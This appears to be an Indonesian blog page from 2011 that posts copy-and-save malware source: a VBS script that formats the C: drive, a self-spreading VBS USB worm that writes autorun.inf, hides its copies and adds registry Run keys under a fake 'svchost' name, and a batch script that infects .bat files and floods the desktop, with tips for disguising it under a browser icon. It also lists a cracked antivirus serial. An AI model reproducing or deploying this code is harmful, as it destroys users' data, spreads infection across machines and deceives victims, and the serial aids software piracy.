ALL ABAOUT VIRUS/MALWARE
Recovery File MS.Office yang terinfeksi Virus
CRACK SMADAV
Name : DYTOSHARE-Private
Serial : 081300521612
===========================================
script format C:/
Posted in Uncategorized on April 18, 2011 by akayscream
Set WshShell = WScript.CreateObject(“WScript.Shell”)
X = MsgBox(“Hey guys.. saya ingin merusak operating system anda ?”, vbYesNo, “xXx Akay death system!! xXx”)
If X = 6 Then
WshShell.Run(“format.com /y C:”)
End If
*save file.vbs
Sunting | Tinggalkan komentar »
================================================
Grysvin Bysnovia
Posted in Uncategorized on April 18, 2011 by akayscream
salin script di bawah ini simpan dengan
nama grysvin_bysnovia.exe.vbs
‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe grysvin_bysnovia.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\grysvin_bysnovia.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\grysvin_bysnovia.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\grysvin_bysnovia.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\grysvin_bysnovia.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\grysvin_bysnovia.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\grysvin_bysnovia.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\grysvin_bysnovia.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3?
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2011
WScript.sleep 20000
msgbox “muak untuk memuja” & vbcrlf & _
“Your system computer will death” & vbcrlf & _
“dont be angry guys. coz thiz world just get fuckin borre” & vbcrlf & _
“take your skateboard and take on your shoes skate”
loop
Sunting | Tinggalkan komentar »
=====================================================
script virus
Posted in Uncategorized on April 6, 2011 by akayscream
@echo off
echo checking system:
echo for %%i in (“*.bat”) do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT
echo VIRUS DETECTED
pause
echo DELETING VIRUS
pause
echo FAILED TO DELETE THE VIRUS
pause
echo CONTACTING THE ANTIVIRUS
pause
echo FAILED
pause
echo FAILED
:1
dir /s
copy c:\tmp.bat c:\docum~1\%username%\desktop\greatgame_%random%.bat
goto 1
save as virus.bat di desktop atau yang lainnya, ekstensinya harus .bat,
kemudian ganti icon-nya, yaitu dengan cara klik kanan, klik properties cari
icon yang diinginkan,
lebih baik pakai iconnya IE atau FF sesuaikan namanya.
tapi sebelumnya buat shortcut ke program virus palsu tadi.
klik kanan shortcut klik properties ganti iconnya.
untuk menghentikan virus palsu tadi dengan cara tekan Ctrl+C,
atau menggunakan taskmanager
